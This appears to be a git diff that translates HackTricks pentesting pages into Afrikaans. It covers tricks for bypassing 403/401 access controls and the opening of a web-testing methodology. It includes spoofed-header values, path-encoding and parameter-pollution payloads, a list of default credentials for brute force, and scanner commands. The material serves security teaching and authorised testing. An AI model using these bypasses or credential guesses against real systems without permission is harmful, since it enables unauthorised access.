+* Kyk na die reaksiehoofers, dalk kan daar inligting gegee word. Byvoorbeeld, 'n **200-reaksie** op **HEAD** met `Content-Length: 55` beteken dat die **HEAD-metode toegang tot die inligting kan kry**. Maar jy moet steeds 'n manier vind om daardie inligting uit te voer.
+* Deur 'n HTTP-hoofer soos `X-HTTP-Method-Override: PUT` te gebruik, kan die gebruikte metode oorskryf word.
+* Gebruik die **`TRACE`-metode** en as jy baie gelukkig is, kan jy dalk ook die **hoofers sien wat deur tussenliggende proksi's bygevoeg is** wat nuttig kan wees.
 
-## HTTP Headers Fuzzing
+## HTTP Hoofers Fuzzing
 
-* **Change Host header** to some arbitrary value ([that worked here](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))
-* Try to [**use other User Agents**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) to access the resource.
-*   **Fuzz HTTP Headers**: Try using HTTP Proxy **Headers**, HTTP Authentication Basic and NTLM brute-force (with a few combinations only) and other techniques. To do all of this I have created the tool [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass).
+* **Verander die Host-hoofer** na 'n willekeurige waarde ([wat hier gewerk het](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))
+* Probeer om [**ander Gebruikersagent**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) te gebruik om toegang tot die bron te verkry.
+*   **Fuzz HTTP Hoofers**: Probeer om HTTP Proxy **Hoofers**, HTTP-verifikasie van Basiese en NTLM-brute force (met 'n paar kombinasies slegs) en ander tegnieke te gebruik. Om dit alles te doen, het ek die gereedskap [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass) geskep.
 
-    * `X-Originating-IP: 127.0.0.1`
-    * `X-Forwarded-For: 127.0.0.1`
-    * `X-Forwarded: 127.0.0.1`
-    * `Forwarded-For: 127.0.0.1`
-    * `X-Remote-IP: 127.0.0.1`
-    * `X-Remote-Addr: 127.0.0.1`
-    * `X-ProxyUser-Ip: 127.0.0.1`
-    * `X-Original-URL: 127.0.0.1`
-    * `Client-IP: 127.0.0.1`
-    * `True-Client-IP: 127.0.0.1`
-    * `Cluster-Client-IP: 127.0.0.1`
-    * `X-ProxyUser-Ip: 127.0.0.1`
-    * `Host: localhost`
+* `X-Originating-IP: 127.0.0.1`
+* `X-Forwarded-For: 127.0.0.1`
+* `X-Forwarded: 127.0.0.1`
+* `Forwarded-For: 127.0.0.1`
+* `X-Remote-IP: 127.0.0.1`
+* `X-Remote-Addr: 127.0.0.1`
+* `X-ProxyUser-Ip: 127.0.0.1`
+* `X-Original-URL: 127.0.0.1`
+* `Client-IP: 127.0.0.1`
+* `True-Client-IP: 127.0.0.1`
+* `Cluster-Client-IP: 127.0.0.1`
+* `X-ProxyUser-Ip: 127.0.0.1`
+* `Host: localhost`
 
-    If the **path is protected** you can try to bypass the path protection using these other headers:
+As die **pad beskerm is**, kan jy probeer om die padbeskerming te omseil deur hierdie ander hoofers te gebruik:
 
-    * `X-Original-URL: /admin/console`
-    * `X-Rewrite-URL: /admin/console`
-* If the page is **behind a proxy**, maybe it's the proxy the one preventing you you to access the private information. Try abusing [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/) **or** [**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.**
-* Fuzz [**special HTTP headers**](special-http-headers.md) looking for different response.
-  * **Fuzz special HTTP headers** while fuzzing **HTTP Methods**.
-* **Remove the Host header** and maybe you will be able to bypass the protection.
+* `X-Original-URL: /admin/console`
+* `X-Rewrite-URL: /admin/console`
+* As die bladsy **agter 'n proksi** is, is dit dalk die proksi wat jou verhoed om toegang tot die privaat inligting te verkry. Probeer om [**HTTP-aanvraagsmokkelary**](../../pentesting-web/http-request-smuggling/) **of** [**hop-by-hop hoofers**](../../pentesting-web/abusing-hop-by-hop-headers.md)** te misbruik.**
+* Fuzz [**spesiale HTTP-hoofers**](special-http-headers.md) op soek na 'n verskillende reaksie.
+* **Fuzz spesiale HTTP-hoofers** terwyl jy **HTTP-metodes** fuzz.
+* **Verwyder die Host-hoofer** en dalk sal jy die beskerming kan omseil.
 
-## Path **Fuzzing**
+## Pad Fuzzing
 
-If _/path_ is blocked:
-
-* Try using _**/**_**%2e/path \_(if the access is blocked by a proxy, this could bypass the protection). Try also**\_\*\* /%252e\*\*/path (double URL encode)
-* Try **Unicode bypass**: _/**%ef%bc%8f**path_ (The URL encoded chars are like "/") so when encoded back it will be _//path_ and maybe you will have already bypassed the _/path_ name check
-* **Other path bypasses**:
-  * site.com/secret –> HTTP 403 Forbidden
-  * site.com/SECRET –> HTTP 200 OK
-  * site.com/secret/ –> HTTP 200 OK
-  * site.com/secret/. –> HTTP 200 OK
-  * site.com//secret// –> HTTP 200 OK
-  * site.com/./secret/.. –> HTTP 200 OK
-  * site.com/;/secret –> HTTP 200 OK
-  * site.com/.;/secret –> HTTP 200 OK
-  * site.com//;//secret –> HTTP 200 OK
-  * site.com/secret.json –> HTTP 200 OK (ruby)
-  * Use all [**this list**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt) in the following situations:
-    * /FUZZsecret
-    * /FUZZ/secret
-    * /secretFUZZ
-* **Other API bypasses:**
-  * /v3/users\_data/1234 --> 403 Forbidden
-  * /v1/users\_data/1234 --> 200 OK
-  * {“id”:111} --> 401 Unauthriozied
-  * {“id”:\[111]} --> 200 OK
-  * {“id”:111} --> 401 Unauthriozied
-  * {“id”:{“id”:111\}} --> 200 OK
-  * {"user\_id":"\","user\_id":"\"} (JSON Parameter Pollution)
-  * user\_id=ATTACKER\_ID\&user\_id=VICTIM\_ID (Parameter Pollution)
+As _/path_ geblokkeer is:
 
+* Probeer om _**/**_**%2e/path \_(as die toegang deur 'n proksi geblokkeer word, kan dit die beskerming omseil). Probeer ook**\_\*\* /%252e\*\*/path (dubbele URL-kodering)
+* Probeer **Unicode-omseiling**: _/**%ef%bc%8f**path_ (Die URL-gekodeerde karakters is soos "/") sodat dit, wanneer dit terug gekodeer word, _//path_ sal wees en dalk het jy reeds die _/path_-naamkontrole omseil
+* **Ander padomseilings**:
+* site.com/secret –> HTTP 403 Verbode
+* site.com/SECRET –> HTTP 200 OK
+* site.com/secret/ –> HTTP 200 OK
+* site.com/secret/. –> HTTP 200 OK
+* site.com//secret// –> HTTP 200 OK
+* site.com/./secret/.. –> HTTP 200 OK
+* site.com/;/secret –> HTTP 200 OK
+* site.com/.;/secret –> HTTP 200 OK
+* site.com//;//secret –> HTTP 200 OK
+* site.com/secret.json –> HTTP 200 OK (ruby)
+* Gebruik die hele [**lys**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt) in die volgende situasies:
+* /FUZZsecret
+* /FUZZ/secret
+* /secretFUZZ
+* **Ander API-omseilings:**
+* /v3/users\_data/1234 --> 403 Verbode
+* /v1/users\_data/1234 --> 200 OK
+* {“id”:111} --> 401 Ongeoutoriseer
+* {“id”:\[111]} --> 200 OK
+* {“id”:111} --> 401 Ongeoutoriseer
+* {“id”:{“id”:111\}} --> 200 OK
+* {"user\_id":"\","user\_id":"\"} (JSON-parameterverontreiniging)
+* user\_id=ATTACKER\_ID\&user\_id=VICTIM\_ID (Parameterverontreiniging)
 ## **Parameter Manipulation**
 
-* Change **param value**: From **`id=123` --> `id=124`**
-* Add additional parameters to the URL: `?`**`id=124` —-> `id=124&isAdmin=true`**
-* Remove the parameters
-* Re-order parameters
-* Use special characters.
-* Perform boundary testing in the parameters — provide values like _-234_ or _0_ or _99999999_ (just some example values).
+* Verander **param-waarde**: Van **`id=123` --> `id=124`**
+* Voeg ekstra parameters by die URL: `?`**`id=124` —-> `id=124&isAdmin=true`**
+* Verwyder die parameters
+* Herskik parameters
+* Gebruik spesiale karakters.
+* Voer grenstoetsing uit in die parameters - verskaf waardes soos _-234_ of _0_ of _99999999_ (net 'n paar voorbeeldwaardes).
 
-## **Protocol version**
+## **Protokolverandering**
 
-If using HTTP/1.1 **try to use 1.0** or even test if it **supports 2.0**.
+As jy HTTP/1.1 gebruik, **probeer om 1.0 te gebruik** of selfs toets of dit **2.0 ondersteun**.
 
-## **Other Bypasses**
+## **Ander omseilings**
 
-* Get the **IP** or **CNAME** of the domain and try **contacting it directly**.
-* Try to **stress the server** sending common GET requests ([It worked for this guy wit Facebook](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)).
-* **Change the protocol**: from http to https, or for https to http
-* Go to [**https://archive.org/web/**](https://archive.org/web/) and check if in the past that file was **worldwide accessible**.
+* Kry die **IP** of **CNAME** van die domein en probeer om direk daarmee **kontak te maak**.
+* Probeer om die bediener te **stres** deur algemene GET-versoeke te stuur ([Dit het vir hierdie ou met Facebook gewerk](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)).
+* **Verander die protokol**: van http na https, of van https na http
+* Gaan na [**https://archive.org/web/**](https://archive.org/web/) en kyk of daardie lêer in die verlede **wêreldwyd toeganklik** was.
 
 ## **Brute Force**
 
-* **Guess the password**: Test the following common credentials. Do you know something about the victim? Or the CTF challenge name?
-* [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** Try basic, digest and NTLM auth.
+* **Raai die wagwoord**: Toets die volgende algemene geloofsbriewe. Weet jy iets van die slagoffer? Of die CTF-uitdaging se naam?
+* [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** Probeer basiese, digest en NTLM-outentifikasie.
 
-{% code title="Common creds" %}
+{% code title="Gewone geloofsbriewe" %}
 ```
 admin    admin
 admin    password
@@ -126,30 +125,30 @@ guest    guest
 ```
 {% endcode %}
 
-## Automatic Tools
+## Outomatiese Gereedskap
 
 * [https://github.com/lobuhi/byp4xx](https://github.com/lobuhi/byp4xx)
 * [https://github.com/iamj0ker/bypass-403](https://github.com/iamj0ker/bypass-403)
 * [https://github.com/gotr00t0day/forbiddenpass](https://github.com/gotr00t0day/forbiddenpass)
-* [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
+* [Burp-uitbreiding - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
 * [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md
index 94165c282..c7b731982 100644
--- a/network-services-pentesting/pentesting-web/README.md
+++ b/network-services-pentesting/pentesting-web/README.md
@@ -1,31 +1,30 @@
-# 80,443 - Pentesting Web Methodology
+# 80,443 - Pentesting Web Metodologie
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**!
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
-## Basic Info
+## Basiese Inligting
 
-The web service is the most **common and extensive service** and a lot of **different types of vulnerabilities** exists.
-
-**Default port:** 80 (HTTP), 443(HTTPS)
+Die webdiens is die mees **gewone en omvattende diens** en daar bestaan baie **verskillende tipes kwesbaarhede**.
 
+**Verstekpoort:** 80 (HTTP), 443 (HTTPS)
 ```bash
 PORT    STATE SERVICE
 80/tcp  open  http
@@ -36,57 +35,54 @@ PORT    STATE SERVICE
 nc -v domain.com 80 # GET / HTTP/1.0
 openssl s_client -connect domain.com:443 # GET / HTTP/1.0
 ```
-
-### Web API Guidance
+### Web API Leiding
 
 {% content-ref url="web-api-pentesting.md" %}
 [web-api-pentesting.md](web-api-pentesting.md)
 {% endcontent-ref %}
 
-## Methodology summary
+## Metodologie opsomming
 
-> In this methodology we are going to suppose that you are going to a attack a domain (or subdomain) and only that. So, you should apply this methodology to each discovered domain, subdomain or IP with undetermined web server inside the scope.
+> In hierdie metodologie gaan ons aanneem dat jy 'n domein (of subdomein) gaan aanval en slegs dit. Pas hierdie metodologie toe op elke ontdekte domein, subdomein of IP met 'n onbepaalde webbediener binne die omvang.
 
-* [ ] Start by **identifying** the **technologies** used by the web server. Look for **tricks** to keep in mind during the rest of the test if you can successfully identify the tech.
-  * [ ] Any **known vulnerability** of the version of the technology?
-  * [ ] Using any **well known tech**? Any **useful trick** to extract more information?
-  * [ ] Any **specialised scanner** to run (like wpscan)?
-* [ ] Launch **general purposes scanners**. You never know if they are going to find something or if the are going to find some interesting information.
-* [ ] Start with the **initial checks**: **robots**, **sitemap**, **404** error and **SSL/TLS scan** (if HTTPS).
-* [ ] Start **spidering** the web page: It's time to **find** all the possible **files, folders** and **parameters being used.** Also, check for **special findings**.
-  * [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._
-* [ ] **Directory Brute-Forcing**: Try to brute force all the discovered folders searching for new **files** and **directories**.
-  * [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
-* [ ] **Backups checking**: Test if you can find **backups** of **discovered files** appending common backup extensions.
-* [ ] **Brute-Force parameters**: Try to **find hidden parameters**.
-* [ ] Once you have **identified** all the possible **endpoints** accepting **user input**, check for all kind of **vulnerabilities** related to it.
-  * [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology/)
+* [ ] Begin deur die **tegnologieë** wat deur die webbediener gebruik word, te **identifiseer**. Soek na **truuks** om in gedagte te hou gedurende die res van die toets as jy die tegnologie suksesvol kan identifiseer.
+* [ ] Enige **bekende kwesbaarheid** van die weergawe van die tegnologie?
+* [ ] Gebruik enige **bekende tegnologie**? Enige **nuttige truuk** om meer inligting te onttrek?
+* [ ] Enige **gespesialiseerde skander** om uit te voer (soos wpscan)?
+* [ ] Begin met die uitvoer van **algemene doeleindes skander**. Jy weet nooit of hulle iets gaan vind of as hulle interessante inligting gaan vind nie.
+* [ ] Begin met die **aanvanklike kontroles**: **robots**, **sitemap**, **404**-fout en **SSL/TLS-skandering** (as HTTPS).
+* [ ] Begin met die **spinnekop** van die webblad: Dit is tyd om al die moontlike **lêers, vouers** en **parameters wat gebruik word**, te **vind**. Kyk ook vir **spesiale bevindinge**.
+* [ ] _Let daarop dat enige tyd 'n nuwe gids ontdek word tydens brute-forcing of spinnekop, dit moet gespinnekop word._
+* [ ] **Gids Brute-Forcing**: Probeer om alle ontdekte vouers te brute force op soek na nuwe **lêers** en **vouers**.
+* [ ] _Let daarop dat enige tyd 'n nuwe gids ontdek word tydens brute-forcing of spinnekop, dit moet brute force word._
+* [ ] **Backups kontroleer**: Toets of jy **backups** van **ontdekte lêers** kan vind deur algemene backup-uitbreidings by te voeg.
+* [ ] **Brute-Force parameters**: Probeer om **verskuilde parameters** te vind.
+* [ ] Nadat jy al die moontlike **eindpunte** wat **gebruikersinsette** aanvaar, geïdentifiseer het, kyk vir alle soorte **kwesbaarhede** wat daarmee verband hou.
+* [ ] [Volg hierdie kontrolelys](../../pentesting-web/web-vulnerabilities-methodology/)
 
-## Server Version (Vulnerable?)
+## Bedienerweergawe (Kwesbaar?)
 
-### Identify
-
-Check if there are **known vulnerabilities** for the server **version** that is running.\
-The **HTTP headers and cookies of the response** could be very useful to **identify** the **technologies** and/or **version** being used. **Nmap scan** can identify the server version, but it could also be useful the tools [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)or [**https://builtwith.com/**](https://builtwith.com)**:**
+### Identifiseer
 
+Kyk of daar **bekende kwesbaarhede** is vir die bediener **weergawe** wat gebruik word.\
+Die **HTTP-koppe en koekies van die respons** kan baie nuttig wees om die **tegnologieë** en/of **weergawe** wat gebruik word, te **identifiseer**. **Nmap-skan** kan die bedienerweergawe identifiseer, maar die hulpmiddels [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)of [**https://builtwith.com/**](https://builtwith.com)**:** kan ook nuttig wees.
 ```bash
 whatweb -a 1  #Stealthy
 whatweb -a 3  #Aggresive
 webtech -u 
 webanalyze -host https://google.com -crawl 2
 ```
+Soek na kwesbaarhede van die webtoepassing weergawe
 
-Search **for** [**vulnerabilities of the web application** **version**](../../generic-methodologies-and-resources/search-exploits.md)
-
-### **Check if any WAF**
+### Kontroleer of enige WAF
 
 * [**https://github.com/EnableSecurity/wafw00f**](https://github.com/EnableSecurity/wafw00f)
 * [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)
 * [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)
 
-### Web tech tricks
+### Web tegnologie truuks
 
-Some **tricks** for **finding vulnerabilities** in different well known **technologies** being used:
+Sommige truuks om kwesbaarhede in verskillende bekende tegnologieë op te spoor:
 
 * [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
 * [**Apache**](apache.md)
@@ -98,8 +94,8 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 * [**Git**](git.md)
 * [**Golang**](golang.md)
 * [**GraphQL**](graphql.md)
-* [**H2 - Java SQL database**](h2-java-sql-database.md)
-* [**IIS tricks**](iis-internet-information-services.md)
+* [**H2 - Java SQL-databasis**](h2-java-sql-database.md)
+* [**IIS truuks**](iis-internet-information-services.md)
 * [**JBOSS**](jboss.md)
 * [**Jenkins**](broken-reference/)
 * [**Jira**](jira.md)
@@ -108,7 +104,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 * [**Laravel**](laravel.md)
 * [**Moodle**](moodle.md)
 * [**Nginx**](nginx.md)
-* [**PHP (php has a lot of interesting tricks that could be exploited)**](php-tricks-esp/)
+* [**PHP (php het baie interessante truuks wat uitgebuit kan word)**](php-tricks-esp/)
 * [**Python**](python.md)
 * [**Spring Actuators**](spring-actuators.md)
 * [**Symphony**](symphony.md)
@@ -120,28 +116,26 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 * [**Wordpress**](wordpress.md)
 * [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/)
 
-_Take into account that the **same domain** can be using **different technologies** in different **ports**, **folders** and **subdomains**._\
-If the web application is using any well known **tech/platform listed before** or **any other**, don't forget to **search on the Internet** new tricks (and let me know!).
+Hou in gedagte dat dieselfde domein verskillende tegnologieë in verskillende poorte, vouers en subdomeine kan gebruik. As die webtoepassing enige bekende tegnologie/platform gebruik wat voorheen gelys is of enige ander, moenie vergeet om op die internet te soek na nuwe truuks (en laat weet my asseblief!).
 
-### Source Code Review
+### Bronkode-oorsig
 
-If the **source code** of the application is available in **github**, apart of performing by **your own a White box test** of the application there is **some information** that could be **useful** for the current **Black-Box testing**:
+As die bronkode van die toepassing beskikbaar is op GitHub, behalwe dat jy self 'n White box-toets van die toepassing uitvoer, is daar inligting wat nuttig kan wees vir die huidige Black-Box-toetsing:
 
-* Is there a **Change-log or Readme or Version** file or anything with **version info accessible** via web?
-* How and where are saved the **credentials**? Is there any (accessible?) **file** with credentials (usernames or passwords)?
-* Are **passwords** in **plain text**, **encrypted** or which **hashing algorithm** is used?
-* Is it using any **master key** for encrypting something? Which **algorithm** is used?
-* Can you **access any of these files** exploiting some vulnerability?
-* Is there any **interesting information in the github** (solved and not solved) **issues**? Or in **commit history** (maybe some **password introduced inside an old commit**)?
+* Is daar 'n Change-log of Readme of Version-lêer of enige iets met toeganklike weergaweinligting via die web?
+* Hoe en waar word die geloofsbriewe gestoor? Is daar enige (toeganklike?) lêer met geloofsbriewe (gebruikersname of wagwoorde)?
+* Is wagwoorde in plain text, geënkripteer of watter hashing-algoritme word gebruik?
+* Word enige meestersleutel gebruik om iets te enkripteer? Watter algoritme word gebruik?
+* Kan jy enige van hierdie lêers toegang kry deur van 'n kwesbaarheid gebruik te maak?
+* Is daar enige interessante inligting in die GitHub (opgeloste en onopgeloste) issues? Of in die commit-geskiedenis (miskien 'n wagwoord wat in 'n ou commit ingevoer is)?
 
 {% content-ref url="code-review-tools.md" %}
 [code-review-tools.md](code-review-tools.md)
 {% endcontent-ref %}
 
-### Automatic scanners
-
-#### General purpose automatic scanners
+### Outomatiese skanderings
 
+#### Algemene doel outomatiese skanderings
 ```bash
 nikto -h 
 whatweb -a 4 
@@ -153,64 +147,60 @@ nuclei -ut && nuclei -target 
 # https://github.com/ignis-sec/puff (client side vulns fuzzer)
 node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ"
 ```
+#### CMS-skandeerders
 
-#### CMS scanners
-
-If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:
+As 'n CMS gebruik word, moenie vergeet om 'n skandeerder te **hardloop** nie, dalk word iets interessants gevind:
 
 [**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**\
-[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
+[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** webwerwe vir sekuriteitskwessies. (GUI)\
 [**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart**\
-**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal.md) **or** [**(M)oodle**](moodle.md)\
+**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal.md) **of** [**(M)oodle**](moodle.md)\
 [**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal.md)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
-
 ```bash
 cmsmap [-f W] -F -d 
 wpscan --force update -e --url 
 joomscan --ec -u 
 joomlavs.rb #https://github.com/rastating/joomlavs
 ```
+> Op hierdie punt moet jy reeds enige inligting hê oor die webbediener wat deur die klient gebruik word (as enige data gegee is) en 'n paar truuks om in gedagte te hou tydens die toets. As jy gelukkig is, het jy selfs 'n CMS gevind en 'n paar skanderings uitgevoer.
 
-> At this point you should already have some information of the web server being used by the client (if any data is given) and some tricks to keep in mind during the test. If you are lucky you have even found a CMS and run some scanner.
+## Stap-vir-stap Webtoepassingsontdekking
 
-## Step-by-step Web Application Discovery
+> Vanaf hier gaan ons begin om met die webtoepassing te interaksieer.
 
-> From this point we are going to start interacting with the web application.
+### Aanvanklike kontroles
 
-### Initial checks
-
-**Default pages with interesting info:**
+**Verstekbladsye met interessante inligting:**
 
 * /robots.txt
 * /sitemap.xml
 * /crossdomain.xml
 * /clientaccesspolicy.xml
 * /.well-known/
-* Check also comments in the main and secondary pages.
+* Kontroleer ook kommentaar in die hoof- en sekondêre bladsye.
 
-**Forcing errors**
+**Forseer foute**
 
-Web servers may **behave unexpectedly** when weird data is sent to them. This may open **vulnerabilities** or **disclosure sensitive information**.
+Webbedieners kan **onverwags optree** wanneer vreemde data na hulle gestuur word. Dit kan **kwesbaarhede** of **gevoelige inligting openbaar**.
 
-* Access **fake pages** like /whatever\_fake.php (.aspx,.html,.etc)
-* **Add "\[]", "]]", and "\[\["** in **cookie values** and **parameter** values to create errors
-* Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**
-* Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE
+* Toegang tot **vals bladsye** soos /whatever\_fake.php (.aspx, .html, ens.)
+* Voeg "\[]", "]]" en "\[\[" by **koekie-waardes** en **parameter-waardes** om foute te skep
+* Skep 'n fout deur insette te gee as **`/~randomthing/%s`** aan die **einde** van die **URL**
+* Probeer **verskillende HTTP-verbindings** soos PATCH, DEBUG of verkeerde soos FAKE
 
-#### **Check if you can upload files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
+#### **Kontroleer of jy lêers kan oplaai (**[**PUT-verbindings, WebDav**](put-method-webdav.md)**)**
 
-If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
+As jy vind dat **WebDav** **geaktiveer** is, maar jy nie genoeg regte het om lêers in die hoofmap op te laai nie, probeer dan:
 
-* **Brute Force** credentials
-* **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
+* **Brute Force**-geloofsbriewe
+* **Laai lêers** via WebDav na die **res** van die **gevonde lêers** binne die webbladsy. Jy mag regte hê om lêers in ander lêers op te laai.
 
-### **SSL/TLS vulnerabilites**
+### **SSL/TLS-kwesbaarhede**
 
-* If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**
-* If the application is **sending sensitive data (passwords) using HTTP**. Then it's a high vulnerability.
-
